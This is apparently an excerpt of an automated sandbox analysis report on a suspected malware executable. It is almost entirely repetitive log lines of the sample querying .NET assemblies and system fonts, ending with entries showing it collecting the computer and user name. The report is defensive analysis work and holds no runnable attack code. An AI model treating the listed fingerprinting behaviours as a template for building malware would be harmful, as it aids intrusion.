                  Source: C:\Users\user\Desktop\6Ctc0o7vhqKgjU7.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\6Ctc0o7vhqKgjU7.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\6Ctc0o7vhqKgjU7.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Accessibility\v4.0_4.0.0.0__b03f5f7f11d50a3a\Accessibility.dll VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\6Ctc0o7vhqKgjU7.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.VisualBasic\v4.0_10.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.dll VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\6Ctc0o7vhqKgjU7.exeQueries volume information: C:\Windows\Fonts\bahnschrift.ttf VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\6Ctc0o7vhqKgjU7.exeQueries volume information: C:\Windows\Fonts\bahnschrift.ttf VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\6Ctc0o7vhqKgjU7.exeQueries volume information: C:\Windows\Fonts\bahnschrift.ttf VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\6Ctc0o7vhqKgjU7.exeQueries volume information: C:\Windows\Fonts\bahnschrift.ttf VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\6Ctc0o7vhqKgjU7.exeQueries volume information: C:\Windows\Fonts\bahnschrift.ttf VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\6Ctc0o7vhqKgjU7.exeQueries volume information: C:\Windows\Fonts\bahnschrift.ttf VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\6Ctc0o7vhqKgjU7.exeQueries volume information: C:\Windows\Fonts\calibrib.ttf VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\6Ctc0o7vhqKgjU7.exeQueries volume information: C:\Windows\Fonts\calibriz.ttf VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\6Ctc0o7vhqKgjU7.exeQueries volume information: C:\Windows\Fonts\cambria.ttc VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\6Ctc0o7vhqKgjU7.exeQueries volume information: C:\Windows\Fonts\cambriai.ttf VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\6Ctc0o7vhqKgjU7.exeQueries volume information: C:\Windows\Fonts\cambriab.ttf VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\6Ctc0o7vhqKgjU7.exeQueries volume information: C:\Windows\Fonts\cambriaz.ttf VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\6Ctc0o7vhqKgjU7.exeQueries volume information: C:\Windows\Fonts\cambria.ttc VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\6Ctc0o7vhqKgjU7.exeQueries volume information: C:\Windows\Fonts\Candara.ttf VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\6Ctc0o7vhqKgjU7.exeQueries volume information: C:\Windows\Fonts\Candaral.ttf VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\6Ctc0o7vhqKgjU7.exeQueries volume information: C:\Windows\Fonts\Candarai.ttf VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\6Ctc0o7vhqKgjU7.exeQueries volume information: C:\Windows\Fonts\Candarali.ttf VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\6Ctc0o7vhqKgjU7.exeQueries volume information: C:\Windows\Fonts\Candarab.ttf VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\6Ctc0o7vhqKgjU7.exeQueries volume information: C:\Windows\Fonts\Candaraz.ttf VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\6Ctc0o7vhqKgjU7.exeQueries volume information: C:\Windows\Fonts\comic.ttf VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\6Ctc0o7vhqKgjU7.exeQueries volume information: C:\Windows\Fonts\comici.ttf VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\6Ctc0o7vhqKgjU7.exeQueries volume information: C:\Windows\Fonts\comicbd.ttf VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\6Ctc0o7vhqKgjU7.exeQueries volume information: C:\Windows\Fonts\comicz.ttf VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\6Ctc0o7vhqKgjU7.exeQueries volume information: C:\Windows\Fonts\constan.ttf VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\6Ctc0o7vhqKgjU7.exeQueries volume information: C:\Windows\Fonts\constani.ttf VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\6Ctc0o7vhqKgjU7.exeQueries volume information: C:\Windows\Fonts\constanb.ttf VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\6Ctc0o7vhqKgjU7.exeQueries volume information: C:\Windows\Fonts\constanz.ttf VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\6Ctc0o7vhqKgjU7.exeQueries volume information: C:\Windows\Fonts\corbel.ttf VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\6Ctc0o7vhqKgjU7.exeQueries volume information: C:\Windows\Fonts\corbell.ttf VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\6Ctc0o7vhqKgjU7.exeQueries volume information: C:\Windows\Fonts\corbeli.ttf VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\6Ctc0o7vhqKgjU7.exeQueries volume information: C:\Windows\Fonts\corbelli.ttf VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\6Ctc0o7vhqKgjU7.exeQueries volume information: C:\Windows\Fonts\corbelb.ttf VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\6Ctc0o7vhqKgjU7.exeQueries volume information: C:\Windows\Fonts\corbelz.ttf VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\6Ctc0o7vhqKgjU7.exeQueries volume information: C:\Windows\Fonts\cour.ttf VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\6Ctc0o7vhqKgjU7.exeQueries volume information: C:\Windows\Fonts\couri.ttf VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\6Ctc0o7vhqKgjU7.exeQueries volume information: C:\Windows\Fonts\courbd.ttf VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\6Ctc0o7vhqKgjU7.exeQueries volume information: C:\Windows\Fonts\courbi.ttf VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\6Ctc0o7vhqKgjU7.exeQueries volume information: C:\Windows\Fonts\ebrima.ttf VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\6Ctc0o7vhqKgjU7.exeQueries volume information: C:\Windows\Fonts\ebrimabd.ttf VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\6Ctc0o7vhqKgjU7.exeQueries volume information: C:\Windows\Fonts\FRADM.TTF VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\6Ctc0o7vhqKgjU7.exeQueries volume information: C:\Windows\Fonts\framdit.ttf VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\6Ctc0o7vhqKgjU7.exeQueries volume information: C:\Windows\Fonts\FRADMIT.TTF VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\6Ctc0o7vhqKgjU7.exeQueries volume information: C:\Windows\Fonts\FRAMDCN.TTF VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\6Ctc0o7vhqKgjU7.exeQueries volume information: C:\Windows\Fonts\gadugi.ttf VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\6Ctc0o7vhqKgjU7.exeQueries volume information: C:\Windows\Fonts\gadugib.ttf VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\6Ctc0o7vhqKgjU7.exeQueries volume information: C:\Windows\Fonts\georgia.ttf VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\6Ctc0o7vhqKgjU7.exeQueries volume information: C:\Windows\Fonts\georgiai.ttf VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\6Ctc0o7vhqKgjU7.exeQueries volume information: C:\Windows\Fonts\georgiab.ttf VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\6Ctc0o7vhqKgjU7.exeQueries volume information: C:\Windows\Fonts\georgiaz.ttf VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\6Ctc0o7vhqKgjU7.exeQueries volume information: C:\Windows\Fonts\impact.ttf VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\6Ctc0o7vhqKgjU7.exeQueries volume information: C:\Windows\Fonts\Inkfree.ttf VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\6Ctc0o7vhqKgjU7.exeQueries volume information: C:\Windows\Fonts\javatext.ttf VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\6Ctc0o7vhqKgjU7.exeQueries volume information: C:\Windows\Fonts\LeelawUI.ttf VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\6Ctc0o7vhqKgjU7.exeQueries volume information: C:\Windows\Fonts\LeelUIsl.ttf VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\6Ctc0o7vhqKgjU7.exeQueries volume information: C:\Windows\Fonts\LeelaUIb.ttf VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\6Ctc0o7vhqKgjU7.exeQueries volume information: C:\Windows\Fonts\lucon.ttf VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\6Ctc0o7vhqKgjU7.exeQueries volume information: C:\Windows\Fonts\l_10646.ttf VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\6Ctc0o7vhqKgjU7.exeQueries volume information: C:\Windows\Fonts\malgun.ttf VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\6Ctc0o7vhqKgjU7.exeQueries volume information: C:\Windows\Fonts\malgunsl.ttf VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\6Ctc0o7vhqKgjU7.exeQueries volume information: C:\Windows\Fonts\malgunbd.ttf VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\6Ctc0o7vhqKgjU7.exeQueries volume information: C:\Windows\Fonts\himalaya.ttf VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\6Ctc0o7vhqKgjU7.exeQueries volume information: C:\Windows\Fonts\msjh.ttc VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\6Ctc0o7vhqKgjU7.exeQueries volume information: C:\Windows\Fonts\msjhl.ttc VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\6Ctc0o7vhqKgjU7.exeQueries volume information: C:\Windows\Fonts\msjhbd.ttc VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\6Ctc0o7vhqKgjU7.exeQueries volume information: C:\Windows\Fonts\msjh.ttc VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\6Ctc0o7vhqKgjU7.exeQueries volume information: C:\Windows\Fonts\msjhl.ttc VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\6Ctc0o7vhqKgjU7.exeQueries volume information: C:\Windows\Fonts\msjhbd.ttc VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\6Ctc0o7vhqKgjU7.exeQueries volume information: C:\Windows\Fonts\ntailu.ttf VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\6Ctc0o7vhqKgjU7.exeQueries volume information: C:\Windows\Fonts\ntailub.ttf VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\6Ctc0o7vhqKgjU7.exeQueries volume information: C:\Windows\Fonts\phagspa.ttf VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\6Ctc0o7vhqKgjU7.exeQueries volume information: C:\Windows\Fonts\phagspab.ttf VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\6Ctc0o7vhqKgjU7.exeQueries volume information: C:\Windows\Fonts\micross.ttf VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\6Ctc0o7vhqKgjU7.exeQueries volume information: C:\Windows\Fonts\taile.ttf VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\6Ctc0o7vhqKgjU7.exeQueries volume information: C:\Windows\Fonts\taileb.ttf VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\6Ctc0o7vhqKgjU7.exeQueries volume information: C:\Windows\Fonts\msyh.ttc VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\6Ctc0o7vhqKgjU7.exeQueries volume information: C:\Windows\Fonts\msyhl.ttc VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\6Ctc0o7vhqKgjU7.exeQueries volume information: C:\Windows\Fonts\msyhbd.ttc VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\6Ctc0o7vhqKgjU7.exeQueries volume information: C:\Windows\Fonts\msyh.ttc VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\6Ctc0o7vhqKgjU7.exeQueries volume information: C:\Windows\Fonts\msyhl.ttc VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\6Ctc0o7vhqKgjU7.exeQueries volume information: C:\Windows\Fonts\msyhbd.ttc VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\6Ctc0o7vhqKgjU7.exeQueries volume information: C:\Windows\Fonts\mingliub.ttc VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\6Ctc0o7vhqKgjU7.exeQueries volume information: C:\Windows\Fonts\mingliub.ttc VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\6Ctc0o7vhqKgjU7.exeQueries volume information: C:\Windows\Fonts\mingliub.ttc VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\6Ctc0o7vhqKgjU7.exeQueries volume information: C:\Windows\Fonts\monbaiti.ttf VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\6Ctc0o7vhqKgjU7.exeQueries volume information: C:\Windows\Fonts\msgothic.ttc VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\6Ctc0o7vhqKgjU7.exeQueries volume information: C:\Windows\Fonts\msgothic.ttc VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\6Ctc0o7vhqKgjU7.exeQueries volume information: C:\Windows\Fonts\msgothic.ttc VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\6Ctc0o7vhqKgjU7.exeQueries volume information: C:\Windows\Fonts\mvboli.ttf VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\6Ctc0o7vhqKgjU7.exeQueries volume information: C:\Windows\Fonts\mmrtext.ttf VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\6Ctc0o7vhqKgjU7.exeQueries volume information: C:\Windows\Fonts\mmrtextb.ttf VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\6Ctc0o7vhqKgjU7.exeQueries volume information: C:\Windows\Fonts\Nirmala.ttf VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\6Ctc0o7vhqKgjU7.exeQueries volume information: C:\Windows\Fonts\NirmalaS.ttf VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\6Ctc0o7vhqKgjU7.exeQueries volume information: C:\Windows\Fonts\NirmalaB.ttf VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\6Ctc0o7vhqKgjU7.exeQueries volume information: C:\Windows\Fonts\pala.ttf VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\6Ctc0o7vhqKgjU7.exeQueries volume information: C:\Windows\Fonts\palai.ttf VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\6Ctc0o7vhqKgjU7.exeQueries volume information: C:\Windows\Fonts\palab.ttf VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\6Ctc0o7vhqKgjU7.exeQueries volume information: C:\Windows\Fonts\palabi.ttf VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\6Ctc0o7vhqKgjU7.exeQueries volume information: C:\Windows\Fonts\segoepr.ttf VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\6Ctc0o7vhqKgjU7.exeQueries volume information: C:\Windows\Fonts\segoeprb.ttf VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\6Ctc0o7vhqKgjU7.exeQueries volume information: C:\Windows\Fonts\segoesc.ttf VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\6Ctc0o7vhqKgjU7.exeQueries volume information: C:\Windows\Fonts\segoescb.ttf VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\6Ctc0o7vhqKgjU7.exeQueries volume information: C:\Windows\Fonts\seguihis.ttf VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\6Ctc0o7vhqKgjU7.exeQueries volume information: C:\Windows\Fonts\simsun.ttc VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\6Ctc0o7vhqKgjU7.exeQueries volume information: C:\Windows\Fonts\simsunb.ttf VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\6Ctc0o7vhqKgjU7.exeQueries volume information: C:\Windows\Fonts\Sitka.ttc VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\6Ctc0o7vhqKgjU7.exeQueries volume information: C:\Windows\Fonts\SitkaI.ttc VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\6Ctc0o7vhqKgjU7.exeQueries volume information: C:\Windows\Fonts\SitkaB.ttc VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\6Ctc0o7vhqKgjU7.exeQueries volume information: C:\Windows\Fonts\SitkaZ.ttc VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\6Ctc0o7vhqKgjU7.exeQueries volume information: C:\Windows\Fonts\Sitka.ttc VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\6Ctc0o7vhqKgjU7.exeQueries volume information: C:\Windows\Fonts\SitkaB.ttc VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\6Ctc0o7vhqKgjU7.exeQueries volume information: C:\Windows\Fonts\sylfaen.ttf VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\6Ctc0o7vhqKgjU7.exeQueries volume information: C:\Windows\Fonts\symbol.ttf VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\6Ctc0o7vhqKgjU7.exeQueries volume information: C:\Windows\Fonts\tahoma.ttf VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\6Ctc0o7vhqKgjU7.exeQueries volume information: C:\Windows\Fonts\tahomabd.ttf VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\6Ctc0o7vhqKgjU7.exeQueries volume information: C:\Windows\Fonts\timesi.ttf VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\6Ctc0o7vhqKgjU7.exeQueries volume information: C:\Windows\Fonts\timesbd.ttf VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\6Ctc0o7vhqKgjU7.exeQueries volume information: C:\Windows\Fonts\timesbi.ttf VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\6Ctc0o7vhqKgjU7.exeQueries volume information: C:\Windows\Fonts\trebucit.ttf VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\6Ctc0o7vhqKgjU7.exeQueries volume information: C:\Windows\Fonts\trebucbd.ttf VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\6Ctc0o7vhqKgjU7.exeQueries volume information: C:\Windows\Fonts\trebucbi.ttf VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\6Ctc0o7vhqKgjU7.exeQueries volume information: C:\Windows\Fonts\verdanai.ttf VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\6Ctc0o7vhqKgjU7.exeQueries volume information: C:\Windows\Fonts\verdanab.ttf VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\6Ctc0o7vhqKgjU7.exeQueries volume information: C:\Windows\Fonts\verdanaz.ttf VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\6Ctc0o7vhqKgjU7.exeQueries volume information: C:\Windows\Fonts\webdings.ttf VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\6Ctc0o7vhqKgjU7.exeQueries volume information: C:\Windows\Fonts\wingding.ttf VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\6Ctc0o7vhqKgjU7.exeQueries volume information: C:\Windows\Fonts\YuGothR.ttc VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\6Ctc0o7vhqKgjU7.exeQueries volume information: C:\Windows\Fonts\YuGothM.ttc VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\6Ctc0o7vhqKgjU7.exeQueries volume information: C:\Windows\Fonts\YuGothL.ttc VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\6Ctc0o7vhqKgjU7.exeQueries volume information: C:\Windows\Fonts\YuGothB.ttc VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\6Ctc0o7vhqKgjU7.exeQueries volume information: C:\Windows\Fonts\YuGothM.ttc VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\6Ctc0o7vhqKgjU7.exeQueries volume information: C:\Windows\Fonts\YuGothR.ttc VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\6Ctc0o7vhqKgjU7.exeQueries volume information: C:\Windows\Fonts\YuGothB.ttc VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\6Ctc0o7vhqKgjU7.exeQueries volume information: C:\Windows\Fonts\holomdl2.ttf VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\6Ctc0o7vhqKgjU7.exeQueries volume information: C:\Windows\Fonts\AGENCYR.TTF VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\6Ctc0o7vhqKgjU7.exeQueries volume information: C:\Windows\Fonts\AGENCYB.TTF VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\6Ctc0o7vhqKgjU7.exeQueries volume information: C:\Windows\Fonts\ALGER.TTF VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\6Ctc0o7vhqKgjU7.exeQueries volume information: C:\Windows\Fonts\BKANT.TTF VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\6Ctc0o7vhqKgjU7.exeQueries volume information: C:\Windows\Fonts\ANTQUAI.TTF VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\6Ctc0o7vhqKgjU7.exeQueries volume information: C:\Windows\Fonts\ARLRDBD.TTF VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\6Ctc0o7vhqKgjU7.exeQueries volume information: C:\Windows\Fonts\BASKVILL.TTF VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\6Ctc0o7vhqKgjU7.exeQueries volume information: C:\Windows\Fonts\BAUHS93.TTF VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\6Ctc0o7vhqKgjU7.exeQueries volume information: C:\Windows\Fonts\BELL.TTF VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\6Ctc0o7vhqKgjU7.exeQueries volume information: C:\Windows\Fonts\BELLB.TTF VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\6Ctc0o7vhqKgjU7.exeQueries volume information: C:\Windows\Fonts\BERNHC.TTF VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\6Ctc0o7vhqKgjU7.exeQueries volume information: C:\Windows\Fonts\BOD_R.TTF VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\6Ctc0o7vhqKgjU7.exeQueries volume information: C:\Windows\Fonts\BOD_I.TTF VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\6Ctc0o7vhqKgjU7.exeQueries volume information: C:\Windows\Fonts\BOD_BI.TTF VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\6Ctc0o7vhqKgjU7.exeQueries volume information: C:\Windows\Fonts\BOD_BLAR.TTF VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\6Ctc0o7vhqKgjU7.exeQueries volume information: C:\Windows\Fonts\BOD_CI.TTF VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\6Ctc0o7vhqKgjU7.exeQueries volume information: C:\Windows\Fonts\BOOKOSBI.TTF VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\6Ctc0o7vhqKgjU7.exeQueries volume information: C:\Windows\Fonts\BRUSHSCI.TTF VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\6Ctc0o7vhqKgjU7.exeQueries volume information: C:\Windows\Fonts\BSSYM7.TTF VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\6Ctc0o7vhqKgjU7.exeQueries volume information: C:\Windows\Fonts\CALIFR.TTF VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\6Ctc0o7vhqKgjU7.exeQueries volume information: C:\Windows\Fonts\CALIFI.TTF VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\6Ctc0o7vhqKgjU7.exeQueries volume information: C:\Windows\Fonts\CALIFB.TTF VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\6Ctc0o7vhqKgjU7.exeQueries volume information: C:\Windows\Fonts\CASTELAR.TTF VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\6Ctc0o7vhqKgjU7.exeQueries volume information: C:\Windows\Fonts\SCHLBKI.TTF VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\6Ctc0o7vhqKgjU7.exeQueries volume information: C:\Windows\Fonts\CHILLER.TTF VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\6Ctc0o7vhqKgjU7.exeQueries volume information: C:\Windows\Fonts\COPRGTB.TTF VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\6Ctc0o7vhqKgjU7.exeQueries volume information: C:\Windows\Fonts\ERASBD.TTF VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\6Ctc0o7vhqKgjU7.exeQueries volume information: C:\Windows\Fonts\FELIXTI.TTF VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\6Ctc0o7vhqKgjU7.exeQueries volume information: C:\Windows\Fonts\FORTE.TTF VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\6Ctc0o7vhqKgjU7.exeQueries volume information: C:\Windows\Fonts\FREESCPT.TTF VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\6Ctc0o7vhqKgjU7.exeQueries volume information: C:\Windows\Fonts\FRSCRIPT.TTF VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\6Ctc0o7vhqKgjU7.exeQueries volume information: C:\Windows\Fonts\GARAIT.TTF VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\6Ctc0o7vhqKgjU7.exeQueries volume information: C:\Windows\Fonts\GARABD.TTF VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\6Ctc0o7vhqKgjU7.exeQueries volume information: C:\Windows\Fonts\GILBI___.TTF VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\6Ctc0o7vhqKgjU7.exeQueries volume information: C:\Windows\Fonts\HARLOWSI.TTF VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\6Ctc0o7vhqKgjU7.exeQueries volume information: C:\Windows\Fonts\HATTEN.TTF VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\6Ctc0o7vhqKgjU7.exeQueries volume information: C:\Windows\Fonts\ITCBLKAD.TTF VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\6Ctc0o7vhqKgjU7.exeQueries volume information: C:\Windows\Fonts\ITCKRIST.TTF VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\6Ctc0o7vhqKgjU7.exeQueries volume information: C:\Windows\Fonts\MISTRAL.TTF VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\6Ctc0o7vhqKgjU7.exeQueries volume information: C:\Windows\Fonts\MOD20.TTF VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\6Ctc0o7vhqKgjU7.exeQueries volume information: C:\Windows\Fonts\MTCORSVA.TTF VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\6Ctc0o7vhqKgjU7.exeQueries volume information: C:\Windows\Fonts\NIAGSOL.TTF VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\6Ctc0o7vhqKgjU7.exeQueries volume information: C:\Windows\Fonts\PAPYRUS.TTF VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\6Ctc0o7vhqKgjU7.exeQueries volume information: C:\Windows\Fonts\PARCHM.TTF VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\6Ctc0o7vhqKgjU7.exeQueries volume information: C:\Windows\Fonts\TCCEB.TTF VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\6Ctc0o7vhqKgjU7.exeQueries volume information: C:\Windows\Fonts\TEMPSITC.TTF VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\6Ctc0o7vhqKgjU7.exeQueries volume information: C:\Windows\Fonts\OFFSYMSL.TTF VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\6Ctc0o7vhqKgjU7.exeQueries volume information: C:\Windows\Fonts\micross.ttf VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\6Ctc0o7vhqKgjU7.exeCode function: 3_2_00404F51 GetLocalTime,CreateEventA,CreateThread,3_2_00404F51
                  Source: C:\Users\user\Desktop\6Ctc0o7vhqKgjU7.exeCode function: 3_2_0041B69E GetComputerNameExW,GetUserNameW,3_2_0041B69E
